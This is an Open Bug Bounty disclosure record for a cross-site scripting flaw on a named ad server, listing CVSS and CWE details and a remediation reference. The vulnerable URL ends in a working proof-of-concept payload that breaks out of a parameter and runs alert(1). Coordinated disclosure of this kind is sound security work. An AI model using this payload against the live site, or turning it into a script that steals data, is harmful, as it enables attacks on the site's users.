adserver.adtechus.com XSS vulnerability

2018-03-12T12:10:00
ID OBB:578832
Type openbugbounty
Reporter newp_th
Modified 2018-04-12T17:23:00

Description

Open Bug Bounty ID: OBB-578832

Description| Value
---|---
Affected Website:| adserver.adtechus.com
Open Bug Bounty Program:| Not created yet
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Disclosure Standard:| Coordinated Disclosure based on ISO 29147 guidelines
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
https://adserver.adtechus.com/adiframe/3.0/5512.1/4775115/0/225/ADTECH;target=_blank;key=key1+key2+key3+key4;grp=[group];misc='+new%20Date().getTime()+';rdclick=;misc=7430083587008828256;rdclick=https://adclick.g.doubleclick.net/aclk?sa=L&ai=CcJ5U31-mWrv0J4TWkgOB9IjABJbw_rxN6uTGo4kBwI23ARABIABg5crlg7QOggEXY2EtcHViLTEwMDQxOTk0MDIwNzQzMDjIAQmoAwGqBIwBT9CH05_pQUgUC3RZIVdXUBvmtCQG-0pKhruYMeOY0vLcidY04pztosomHv9OEzo6XBA91WvudAfNtfOp-XUEkDxoTXRbBL-nuikCYkRXr0XmGZR3HgPMV90erhkbnWvUE6P9-M9Ckv2OnxwNnYQyFOXXcI9T5ObM6cgjCt4-eOdXbGNawYweG8OVYieABqiUkM6M5bLPkQGgBiGoB6a-G9gHANIIBQiAARAB">alert(1)